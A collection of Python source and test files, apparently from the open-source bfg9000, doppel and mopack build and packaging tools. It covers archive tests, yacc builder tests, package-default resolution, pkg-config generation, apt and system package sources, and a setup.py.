self.tool('archive', ['src1', 'src2'], 'dst', format='tar'),
[self.tool, '-ipN', '-f', 'tar', 'src1', 'src2', 'dst']
)
self.assertEqual(
self.tool('archive', 'src', 'dst', directory='dir', format='tar'),
[self.tool, '-ipN', '-f', 'tar', '-C', 'dir', 'src', 'dst']
)
self.assertEqual(
self.tool('archive', 'src', 'dst', format='tar',
dest_prefix='pre'),
[self.tool, '-ipN', '-f', 'tar', '-P', 'pre', 'src', 'dst']
)
def test_call_invalid(self):
self.assertRaises(TypeError, self.tool, 'unknown', 'src', 'dst')
```
#### File: unit/tools/test_internal.py
```python
from . import *
from bfg9000.safe_str import shell_literal
from bfg9000.shell.list import shell_list
from bfg9000.tools.internal import Bfg9000, Depfixer, JvmOutput, RccDep
class TestBfg9000(ToolTestCase):
tool_type = Bfg9000
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('bfg9000'), Bfg9000)
def test_refresh(self):
self.assertEqual(self.tool('refresh', 'builddir'),
[self.tool, 'refresh', 'builddir'])
def test_run(self):
self.assertEqual(self.tool('run', args=['echo', 'hi']),
[self.tool, 'run', '--', 'echo', 'hi'])
self.assertEqual(self.tool('run', args=['echo', 'hi'], initial=True),
[self.tool, 'run', '-I', '--', 'echo', 'hi'])
def test_call_invalid(self):
self.assertRaises(TypeError, self.tool, 'unknown')
class TestDepfixer(ToolTestCase):
tool_type = Depfixer
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('depfixer'), Depfixer)
def test_depfixer(self):
self.assertEqual(self.tool('depfile'), shell_list([
self.tool, shell_literal('<'), 'depfile', shell_literal('>>'),
'depfile'
]))
class TestJvmOutput(ToolTestCase):
tool_type = JvmOutput
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('jvmoutput'), JvmOutput)
def test_jvmoutput(self):
self.assertEqual(self.tool('output', ['echo', 'hi']),
[self.tool, '-o', 'output', '--', 'echo', 'hi'])
class TestRccDep(ToolTestCase):
tool_type = RccDep
def test_env(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.assertIsInstance(self.env.tool('rccdep'), RccDep)
def test_rccdep(self):
self.assertEqual(self.tool(['echo', 'hi'], 'depfile'),
[self.tool, 'echo', 'hi', '-d', 'depfile'])
```
#### File: unit/tools/test_yacc.py
```python
from .. import *
from bfg9000 import options as opts
from bfg9000.file_types import *
from bfg9000.languages import Languages
from bfg9000.path import Path, Root
from bfg9000.tools.yacc import YaccBuilder
known_langs = Languages()
with known_langs.make('yacc') as x:
x.vars(compiler='YACC', flags='YFLAGS')
class TestYaccBuilder(CrossPlatformTestCase):
def __init__(self, *args, **kwargs):
super().__init__(clear_variables=True, *args, **kwargs)
def setUp(self):
self.yacc = YaccBuilder(self.env, known_langs['yacc'], ['yacc'], True,
'version')
self.compiler = self.yacc.transpiler
def test_properties(self):
self.assertEqual(self.compiler.num_outputs, 1)
self.assertEqual(self.compiler.deps_flavor, None)
def test_call(self):
self.assertEqual(self.compiler('in', 'out'),
[self.compiler, 'in', '-o', 'out'])
self.assertEqual(self.compiler('in', 'out', ['flags']),
[self.compiler, 'flags', 'in', '-o', 'out'])
def test_default_name(self):
src = SourceFile(Path('file.l', Root.srcdir), 'yacc')
self.assertEqual(self.compiler.default_name(src, None),
['file.tab.c', 'file.tab.h'])
self.assertEqual(self.compiler.default_name(src, AttrDict(
user_options=opts.option_list(opts.lang('c++'))
)), ['file.tab.cpp', 'file.tab.hpp'])
with self.assertRaises(ValueError):
self.compiler.default_name(src, AttrDict(
user_options=opts.option_list(opts.lang('java'))
))
def test_output_file(self):
src = SourceFile(Path('file.tab.c'), 'c')
hdr = HeaderFile(Path('file.tab.h'), 'c')
self.assertEqual(self.compiler.output_file('file.tab.c', None), src)
self.assertEqual(self.compiler.output_file(
['file.tab.c', 'file.tab.h'], None
), [src, hdr])
src = SourceFile(Path('file.tab.cpp'), 'c++')
hdr = HeaderFile(Path('file.tab.hpp'), 'c++')
context = AttrDict(user_options=opts.option_list(opts.lang('c++')))
self.assertEqual(self.compiler.output_file('file.tab.cpp', context),
src)
self.assertEqual(self.compiler.output_file(
['file.tab.cpp', 'file.tab.hpp'], context
), [src, hdr])
with self.assertRaises(ValueError):
self.compiler.output_file(['file.tab.c', 'file.tab.h', 'extra'],
None)
def test_flags_empty(self):
self.assertEqual(self.compiler.flags(opts.option_list()), [])
def test_flags_define(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.define('NAME')
)), ['-DNAME'])
self.assertEqual(self.compiler.flags(opts.option_list(
opts.define('NAME', 'value')
)), ['-DNAME=value'])
def test_flags_warning(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.warning('disable')
)), ['-w'])
with self.assertRaises(ValueError):
self.compiler.flags(opts.option_list(opts.warning('all')))
def test_flags_lang(self):
self.assertEqual(self.compiler.flags(opts.option_list(
opts.lang('c++')
)), ['--language=c++'])
def test_flags_string(self):
self.assertEqual(self.compiler.flags(opts.option_list('-i')), ['-i'])
def test_flags_invalid(self):
with self.assertRaises(TypeError):
self.compiler.flags(opts.option_list(123))
``` |
{
"source": "jimporter/doppel",
"score": 3
} |
#### File: doppel/test/__init__.py
```python
import os
import unittest
from itertools import chain
this_dir = os.path.abspath(os.path.dirname(__file__))
test_data_dir = os.path.join(this_dir, 'data')
test_stage_dir = os.path.join(this_dir, 'stage')
def assertDirectory(path, contents):
path = os.path.normpath(path)
actual = set(os.path.normpath(os.path.join(path, base, f))
for base, dirs, files in os.walk(path)
for f in chain(files, dirs))
expected = set(os.path.normpath(os.path.join(path, i)) for i in contents)
if actual != expected:
missing = [os.path.relpath(i, path) for i in (expected - actual)]
extra = [os.path.relpath(i, path) for i in (actual - expected)]
raise unittest.TestCase.failureException(
'missing: {}, extra: {}'.format(missing, extra)
)
```
#### File: test/integration/test_archive.py
```python
import os
import shutil
import subprocess
import tarfile
import zipfile
from .. import *
from doppel import makedirs, mkdir
class TestArchive(unittest.TestCase):
def setUp(self):
self.stage = os.path.join(test_stage_dir, 'archive')
if os.path.exists(self.stage):
shutil.rmtree(self.stage)
makedirs(self.stage)
os.chdir(test_data_dir)
# Git doesn't store empty directories, so make one.
mkdir('empty_dir', exist_ok=True)
def test_archive_file(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'file.txt'})
def test_archive_file_mode(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-m600', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'file.txt'})
self.assertEqual(t.getmember('file.txt').mode, 0o600)
def test_archive_empty_dir(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'empty_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'empty_dir'})
def test_archive_full_dir(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', 'full_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {'full_dir'})
def test_archive_full_dir_recursive(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', 'full_dir', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'full_dir',
'full_dir/file.txt',
})
def test_archive_multiple(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
def test_archive_mutiple_tar(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-ftar', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
def test_archive_mutiple_bzip2(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fbzip2', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'empty_dir',
'full_dir',
'full_dir/file.txt',
'file.txt',
})
def test_archive_multiple_zip(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fzip', '-r', 'empty_dir',
'full_dir', 'file.txt', dst])
with zipfile.ZipFile(dst) as t:
self.assertEqual(set(t.namelist()), {
'empty_dir/',
'full_dir/',
'full_dir/file.txt',
'file.txt',
})
def test_archive_prefix(self):
dst = os.path.join(self.stage, 'archive.tar.gz')
subprocess.check_call(['doppel', '-fgzip', '-r', '--dest-prefix',
'prefix', 'empty_dir', 'full_dir', 'file.txt',
dst])
with tarfile.open(dst) as t:
self.assertEqual(set(t.getnames()), {
'prefix/empty_dir',
'prefix/full_dir',
'prefix/full_dir/file.txt',
'prefix/file.txt',
})
```
#### File: test/integration/test_errors.py
```python
import subprocess
from .. import *
def check_output(command):
return subprocess.check_output(command, stderr=subprocess.STDOUT,
universal_newlines=True)
class TestErrors(unittest.TestCase):
def test_onto_and_format(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--onto', '--format', 'zip', 'dest'])
def test_dest_prefix_without_format(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--dest-prefix', 'prefix', 'dest'])
def test_onto_multiple_sources(self):
with self.assertRaises(subprocess.CalledProcessError):
check_output(['doppel', '--onto', 'src1', 'src2', 'dest'])
def test_dest_nonexistent(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', 'src', 'nonexist'])
self.assertEqual(e.exception.output,
"doppel: directory 'nonexist' does not exist\n")
def test_dest_is_not_directory(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', 'src', 'file.txt'])
self.assertEqual(e.exception.output,
"doppel: 'file.txt' is not a directory\n")
def test_make_parents_dest_is_not_directory(self):
os.chdir(test_data_dir)
with self.assertRaises(subprocess.CalledProcessError) as e:
check_output(['doppel', '--into', '-p', 'src', 'file.txt'])
self.assertEqual(e.exception.output,
"doppel: 'file.txt' is not a directory\n")
```
#### File: test/unit/test_remove.py
```python
import os
import platform
import shutil
from .. import *
from doppel import makedirs, remove
platform_name = platform.system()
class TestRemove(unittest.TestCase):
def setUp(self):
self.stage = os.path.join(test_stage_dir, 'remove')
if os.path.exists(self.stage):
shutil.rmtree(self.stage)
makedirs(self.stage)
os.chdir(test_data_dir)
def test_remove(self):
dst = os.path.join(self.stage, 'file.txt')
open(dst, 'w').close()
remove(dst)
self.assertFalse(os.path.exists(dst))
def test_remove_dir(self):
dst = os.path.join(self.stage, 'subdir')
makedirs(dst)
self.assertRaises(OSError, remove, dst)
shutil.rmtree(dst)
def test_remove_nonexist(self):
dst = os.path.join(self.stage, 'file.txt')
self.assertRaises(OSError, remove, dst)
remove(dst, nonexist_ok=True)
``` |
{
"source": "jimporter/mopack",
"score": 2
} |
#### File: mopack/mopack/package_defaults.py
```python
import os
import re
from pkg_resources import resource_filename
from yaml.error import MarkedYAMLError
from . import expression as expr, iterutils, types
from .objutils import memoize
from .yaml_tools import load_file, SafeLineLoader
class DefaultConfig:
_known_genera = {'source', 'usage'}
def __init__(self, filename):
with load_file(filename, Loader=SafeLineLoader) as cfg:
for genus, genus_cfg in cfg.items():
if genus not in self._known_genera:
msg = 'unknown genus {!r}'.format(genus)
raise MarkedYAMLError(None, None, msg,
cfg.marks[genus].start)
self._process_genus(genus_cfg)
self._data = cfg
def _process_genus(self, data):
for species, cfgs in data.items():
if iterutils.isiterable(cfgs):
for i, cfg in enumerate(cfgs):
if i < len(cfgs) - 1 and 'if' not in cfg:
ctx = 'while parsing default for {!r}'.format(species)
msg = ('default config has no `if` field, but is ' +
'not last entry of list')
raise MarkedYAMLError(ctx, cfgs.mark.start, msg,
cfg.mark.start)
cfgs[i] = self._parse_default_fields(cfg)
else:
data[species] = self._parse_default_fields(cfgs)
def _parse_default_fields(self, data):
def parse_recursive(data):
if isinstance(data, str):
return expr.parse(data)
elif isinstance(data, (dict, list)):
for k, v in iterutils.iteritems(data):
data[k] = parse_recursive(v)
return data
return data
for k, v in data.items():
if k == 'if':
if isinstance(v, str):
data[k] = expr.parse(v, if_context=True)
else:
data[k] = parse_recursive(v)
return data
@staticmethod
def _if_evaluate(symbols, expression):
if isinstance(expression, bool):
return expression
return expression(symbols)
@classmethod
def _evaluate_recursive(cls, symbols, data):
if isinstance(data, expr.Token):
return data(symbols)
elif isinstance(data, list):
return [cls._evaluate_recursive(symbols, i) for i in data]
elif isinstance(data, dict):
return {k: cls._evaluate_recursive(symbols, v)
for k, v in data.items()}
return data
@classmethod
def _select_from_list(cls, symbols, data):
if isinstance(data, list):
for i in data:
if cls._if_evaluate(symbols, i.get('if', True)):
return i
return data
def get(self, symbols, genus, species, field, default=None):
if genus not in self._known_genera:
raise ValueError('unknown genus {!r}'.format(genus))
defaults = self._data.get(genus, {})
if species in defaults:
fields = self._select_from_list(symbols, defaults[species])
if field in fields:
return self._evaluate_recursive(symbols, fields[field])
fields = self._select_from_list(symbols, defaults.get('*', {}))
return self._evaluate_recursive(symbols, fields.get(field, default))
@memoize
def _get_default_config(package_name):
if re.search(r'\W', package_name):
return None
path = resource_filename('mopack', 'defaults/{}.yml'.format(package_name))
if os.path.exists(path):
return DefaultConfig(path)
return None
def get_default(symbols, package_name, genus, species, field, default=None):
default_cfg = _get_default_config(package_name)
if default_cfg is None:
return default
return default_cfg.get(symbols, genus, species, field, default)
class DefaultResolver:
def __init__(self, obj, symbols, name=None):
self.package_name = name or obj.name
self.genus = obj._default_genus
self.species = getattr(obj, obj._type_field)
self.symbols = symbols
def __call__(self, other, field=None, default=None, extra_symbols=None):
forced_field = field
symbols = dict(**self.symbols, **(extra_symbols or {}))
def check(field, value):
if value is types.Unset:
value = get_default(
symbols, self.package_name, self.genus, self.species,
forced_field or field, default
)
return other(field, value)
return check
```
#### File: mopack/mopack/pkg_config.py
```python
import os
from .path import Path
from .shell import quote_native, ShellArguments
def _write_variable(out, name, value):
if value is None:
return False
elif not isinstance(value, str):
raise TypeError(type(value))
out.write('{}={}\n'.format(name, value))
return True
def _write_field(out, name, value, var_symbols={}):
if value is None:
return False
elif isinstance(value, ShellArguments):
value = ' '.join(value.fill(
lambda s, orig: quote_native(s, force=isinstance(orig, Path)),
**var_symbols
))
elif not isinstance(value, str):
raise TypeError(type(value))
out.write('{}: {}\n'.format(name, value))
return True
def generated_pkg_config_dir(pkgdir):
return os.path.join(pkgdir, 'pkgconfig')
def write_pkg_config(out, name, *, desc='mopack-generated package',
version='', cflags=None, libs=None, variables={}):
out.write('# Do not edit this file! It was automatically generated by ' +
'mopack.\n\n')
wrote_var = False
for k, v in variables.items():
wrote_var |= _write_variable(out, k, v)
if wrote_var:
out.write('\n')
var_symbols = {k: '${{{}}}'.format(k) for k, v in variables.items()
if v is not None}
_write_field(out, 'Name', name, var_symbols)
_write_field(out, 'Description', desc, var_symbols)
_write_field(out, 'Version', version, var_symbols)
_write_field(out, 'Cflags', cflags, var_symbols)
_write_field(out, 'Libs', libs, var_symbols)
```
#### File: mopack/mopack/platforms.py
```python
import platform
import subprocess
from .objutils import memoize
def framework(name):
return {'type': 'framework', 'name': name}
_package_library_names = {
'posix': {
'gl': 'GL',
'glu': 'GLU',
'zlib': 'z',
},
'darwin': {
'gl': framework('OpenGL'),
'glu': framework('OpenGL'),
'glut': framework('GLUT'),
},
'windows': {
'gl': 'opengl32',
'glu': 'glu32',
'glut': 'glut32',
},
}
@memoize
def platform_name():
system = platform.system().lower()
if system.startswith('cygwin'):
return 'cygwin'
elif system == 'windows':
try:
uname = subprocess.check_output(
'uname', universal_newlines=True
).lower()
if uname.startswith('cygwin'):
return 'cygwin'
except OSError:
pass
return system
def package_library_name(platform, package):
try:
mapping = _package_library_names[platform]
except KeyError:
mapping = _package_library_names['posix']
return mapping.get(package, package)
```
#### File: mopack/sources/apt.py
```python
import subprocess
from itertools import chain
from . import BinaryPackage
from .. import log, types
from ..environment import get_cmd
from ..iterutils import uniques
class AptPackage(BinaryPackage):
source = 'apt'
_version = 1
@staticmethod
def upgrade(config, version):
return config
def __init__(self, name, *, remote=None, repository=None, usage='system',
**kwargs):
super().__init__(name, usage=usage, **kwargs)
T = types.TypeCheck(locals(), self._expr_symbols)
T.remote(types.maybe(
types.list_of(types.string, listify=True, allow_empty=False),
default=['lib{}-dev'.format(name)]
))
T.repository(types.maybe(types.string))
def guessed_version(self, pkgdir):
# XXX: Maybe try to de-munge the version into something not
# apt-specific?
dpkgq = get_cmd(self._common_options.env, 'DPKG_QUERY', 'dpkg-query')
return subprocess.run(
dpkgq + ['-W', '-f${Version}', self.remote[0]],
check=True, stdout=subprocess.PIPE, universal_newlines=True
).stdout
@classmethod
def resolve_all(cls, packages, pkgdir):
for i in packages:
log.pkg_resolve(i.name, 'from {}'.format(cls.source))
env = packages[0]._common_options.env
apt = get_cmd(env, 'APT_GET', 'sudo apt-get')
aptrepo = get_cmd(env, 'ADD_APT_REPOSITORY', 'sudo add-apt-repository')
remotes = list(chain.from_iterable(i.remote for i in packages))
repositories = uniques(i.repository for i in packages if i.repository)
with log.LogFile.open(pkgdir, 'apt') as logfile:
for i in repositories:
logfile.check_call(aptrepo + ['-y', i])
logfile.check_call(apt + ['update'])
logfile.check_call(apt + ['install', '-y'] + remotes)
for i in packages:
i.resolved = True
@staticmethod
def deploy_all(packages, pkgdir):
pass
```
#### File: mopack/sources/system.py
```python
from . import BinaryPackage
from .. import log
from ..types import FieldKeyError, Unset
class SystemPackage(BinaryPackage):
source = 'system'
_version = 1
@staticmethod
def upgrade(config, version):
return config
def __init__(self, name, *, version=Unset, auto_link=Unset,
include_path=Unset, library_path=Unset, headers=Unset,
libraries=Unset, compile_flags=Unset, link_flags=Unset,
submodule_map=Unset, usage=Unset, **kwargs):
if usage is not Unset:
raise FieldKeyError((
"'system' package doesn't accept 'usage' attribute; " +
"pass usage options directly"
), 'usage')
super().__init__(name, usage={
'type': 'system', 'auto_link': auto_link, 'version': version,
'include_path': include_path, 'library_path': library_path,
'headers': headers, 'libraries': libraries,
'compile_flags': compile_flags, 'link_flags': link_flags,
'submodule_map': submodule_map,
}, _usage_field=None, **kwargs)
def resolve(self, pkgdir):
log.pkg_resolve(self.name, 'from {}'.format(self.source))
self.resolved = True
def deploy(self, pkgdir):
pass
def fallback_system_package(name, options):
pkg = SystemPackage(name, config_file=None, _options=options)
pkg.resolved = True
return pkg
```
#### File: jimporter/mopack/setup.py
```python
import json
import os
import re
import subprocess
from setuptools import setup, find_packages, Command
from mopack.app_version import version
root_dir = os.path.abspath(os.path.dirname(__file__))
class Coverage(Command):
description = 'run tests with code coverage'
user_options = [
('test-suite=', 's',
"test suite to run (e.g. 'some_module.test_suite')"),
]
def initialize_options(self):
self.test_suite = None
def finalize_options(self):
pass
def _make_subproc_rc(self):
# For reasons I don't fully understand, coverage.py doesn't correctly
# cover files in integration tests using our normal `.coveragerc`. To
# fix this, change that line to `include = ${TOP}/mopack/*` so we get
# full coverage. We don't do this universally, since using `source`
# makes sure that if we run a subset of tests, coverage.py picks up
# files with 0 coverage.
with open(os.path.join(root_dir, '.coveragerc')) as f:
rc = f.read()
fixed = rc.replace('source = mopack', 'include = ${TOP}/mopack/*')
result = os.path.join(root_dir, '.coveragerc-subproc')
with open(result, 'w') as f:
f.write(fixed)
return result
def run(self):
env = dict(os.environ)
pythonpath = os.path.join(root_dir, 'test', 'scripts')
if env.get('PYTHONPATH'):
pythonpath += os.pathsep + env['PYTHONPATH']
env.update({
'TOP': root_dir,
'PYTHONPATH': pythonpath,
'COVERAGE_FILE': os.path.join(root_dir, '.coverage'),
'COVERAGE_PROCESS_START': self._make_subproc_rc(),
})
subprocess.run(['coverage', 'erase'], check=True)
subprocess.run(
['coverage', 'run', 'setup.py', 'test'] +
(['-q'] if self.verbose == 0 else []) +
(['-s', self.test_suite] if self.test_suite else []),
env=env, check=True
)
subprocess.run(['coverage', 'combine'], check=True,
stdout=subprocess.DEVNULL)
custom_cmds = {
'coverage': Coverage,
}
try:
from verspec.python import Version
class DocServe(Command):
description = 'serve the documentation locally'
user_options = [
('working', 'w', 'use the documentation in the working directory'),
('dev-addr=', None, 'address to host the documentation on'),
]
def initialize_options(self):
self.working = False
self.dev_addr = '0.0.0.0:8000'
def finalize_options(self):
pass
def run(self):
cmd = 'mkdocs' if self.working else 'mike'
subprocess.run([
cmd, 'serve', '--dev-addr=' + self.dev_addr
], check=True)
class DocDeploy(Command):
description = 'push the documentation to GitHub'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
v = Version(version)
alias = 'dev' if v.is_devrelease else 'latest'
title = '{} ({})'.format(v.base_version, alias)
short_version = '{}.{}'.format(*v.release[:2])
try:
info = json.loads(subprocess.run(
['mike', 'list', '-j', alias], universal_newlines=True,
check=True, stdout=subprocess.PIPE
))
except subprocess.CalledProcessError:
info = None
if info and info['version'] != short_version:
t = re.sub(r' \({}\)$'.format(re.escape(alias)), '',
info['title'])
subprocess.run(['mike', 'retitle', info['version'], t],
check=True)
subprocess.run(['mike', 'deploy', '-ut', title, short_version,
alias], check=True)
custom_cmds['doc_serve'] = DocServe
custom_cmds['doc_deploy'] = DocDeploy
except ImportError:
pass
try:
from flake8.main.application import Application as Flake8
class LintCommand(Command):
description = 'run flake8 on source code'
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def distribution_files(self):
return ['setup.py', 'mopack', 'test']
def run(self):
flake8 = Flake8()
flake8.initialize([])
flake8.run_checks(list(self.distribution_files()))
flake8.formatter.start()
flake8.report_errors()
flake8.report_statistics()
flake8.report_benchmarks()
flake8.formatter.stop()
try:
flake8.exit()
except SystemExit as e:
# If successful, don't exit. This allows other commands to run
# too.
if e.code:
raise
custom_cmds['lint'] = LintCommand
except ImportError:
pass
with open(os.path.join(root_dir, 'README.md'), 'r') as f:
# Read from the file and strip out the badges.
long_desc = re.sub(r'(^# mopack)\n\n(.+\n)*', r'\1', f.read())
setup(
name='mopack',
version=version,
description='A multiple-origin package manager',
long_description=long_desc,
long_description_content_type='text/markdown',
keywords='package manager',
url='https://github.com/jimporter/mopack',
author='<NAME>',
author_email='<EMAIL>',
license='BSD',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=find_packages(exclude=['test', 'test.*']),
package_data={'': ['defaults/*.yml']},
install_requires=['colorama', 'pyparsing', 'pyyaml', 'setuptools'],
extras_require={
'dev': ['bfg9000', 'conan', 'coverage', 'flake8 >= 3.6',
'mike >= 0.3.1', 'mkdocs-bootswatch', 'shtab'],
'test': ['bfg9000', 'conan', 'coverage', 'flake8 >= 3.6', 'shtab'],
},
entry_points={
'console_scripts': [
'mopack=mopack.driver:main'
],
'mopack.sources': [
'apt=mopack.sources.apt:AptPackage',
'conan=mopack.sources.conan:ConanPackage',
'directory=mopack.sources.sdist:DirectoryPackage',
'git=mopack.sources.sdist:GitPackage',
'system=mopack.sources.system:SystemPackage',
'tarball=mopack.sources.sdist:TarballPackage',
],
'mopack.builders': [
'bfg9000=mopack.builders.bfg9000:Bfg9000Builder',
'cmake=mopack.builders.cmake:CMakeBuilder',
'custom=mopack.builders.custom:CustomBuilder',
'none=mopack.builders.none:NoneBuilder',
],
'mopack.usage': [
'path=mopack.usage.path_system:PathUsage',
'pkg_config=mopack.usage.pkg_config:PkgConfigUsage',
'system=mopack.usage.path_system:SystemUsage',
],
},
test_suite='test',
cmdclass=custom_cmds,
)
```
#### File: test/integration/test_apt.py
```python
import json
import os
from unittest import skipIf
from . import *
@skipIf('apt' not in test_features,
'skipping apt tests; add `apt` to `MOPACK_EXTRA_TESTS` to enable')
class TestApt(IntegrationTest):
name = 'apt'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-apt.yml')
self.assertPopen(['mopack', 'resolve', config],
extra_env={'PKG_CONFIG': 'nonexist'})
self.assertExists('mopack/logs/apt.log')
self.assertExists('mopack/mopack.json')
self.assertPathUsage('ogg', type='system', version=AlwaysEqual())
self.assertPathUsage('zlib', type='system', version=AlwaysEqual(),
libraries=['z'])
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(),
'packages': [
cfg_apt_pkg(
'ogg', config,
remote=['libogg-dev'],
usage=cfg_system_usage(
pcfile='ogg',
libraries=[{'name': 'ogg', 'type': 'guess'}]
)
),
cfg_apt_pkg(
'zlib', config,
remote=['zlib1g-dev'],
usage=cfg_system_usage(
pcfile='zlib',
libraries=[{'name': 'zlib', 'type': 'guess'}]
)
),
],
})
self.assertPopen(['mopack', 'deploy'])
```
#### File: test/integration/test_clean_needed.py
```python
import json
import os
from . import *
class TestCleanNeeded(IntegrationTest):
name = 'clean-needed'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-nested-extra.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/build/greeter/extra.txt')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/build/hello/extra.txt')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(bfg9000={}),
'packages': [
cfg_directory_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg'},
builder=cfg_bfg9000_builder(
'hello', extra_args=['--extra']
)
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder(
'greeter', extra_args=['--extra']
)
),
],
})
# Rebuild with a different config.
config = os.path.join(test_data_dir, 'mopack-nested.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertNotExists('mopack/build/greeter/extra.txt')
self.assertNotExists('mopack/build/hello/extra.txt')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(bfg9000={}),
'packages': [
cfg_tarball_pkg(
'hello',
os.path.join(test_data_dir, 'greeter-bfg', 'mopack.yml'),
parent='greeter',
path={'base': 'cfgdir',
'path': os.path.join('..', 'hello-bfg.tar.gz')},
guessed_srcdir='hello-bfg',
builder=cfg_bfg9000_builder('hello')
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder('greeter')
),
],
})
```
#### File: test/integration/test_conan.py
```python
import json
import os
from . import *
class TestConan(IntegrationTest):
name = 'conan'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-conan.yml')
self.assertPopen(['mopack', 'resolve', '-Sconan:extra_args=-gtxt',
config])
self.assertExists('mopack/logs/conan.log')
self.assertExists('mopack/conan/conanbuildinfo.txt')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('zlib', path=[os.path.join(
self.stage, 'mopack', 'conan'
)])
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
conan={'build': ['missing'], 'extra_args': ['-gtxt']}
),
'packages': [
cfg_conan_pkg(
'zlib', config,
remote='zlib/1.2.11',
options={'shared': True},
usage=cfg_pkg_config_usage(
path=[{'base': 'builddir', 'path': ''}],
pcfile='zlib'
)
),
],
})
```
#### File: test/integration/test_custom_builder.py
```python
import json
import os
from mopack.path import pushd
from mopack.platforms import platform_name
from . import *
class TestCustomBuilder(IntegrationTest):
name = 'custom-builder'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-custom-builder.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/src/hello/hello-bfg/build.bfg')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(),
'packages': [
cfg_tarball_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg.tar.gz'},
guessed_srcdir='hello-bfg',
builder=cfg_custom_builder(
'hello',
build_commands=[
['bfg9000', 'configure',
{'base': 'builddir', 'path': ''}],
['cd', [{'base': 'builddir', 'path': ''}, '/.']],
['ninja'],
],
deploy_commands=[
['ninja', 'install'],
],
usage=cfg_pkg_config_usage(pcfile='hello')
)
),
],
})
class TestCustomBuilderDeploy(IntegrationTest):
name = 'custom-builder-deploy'
maxDiff = None
deploy = True
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-custom-builder.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
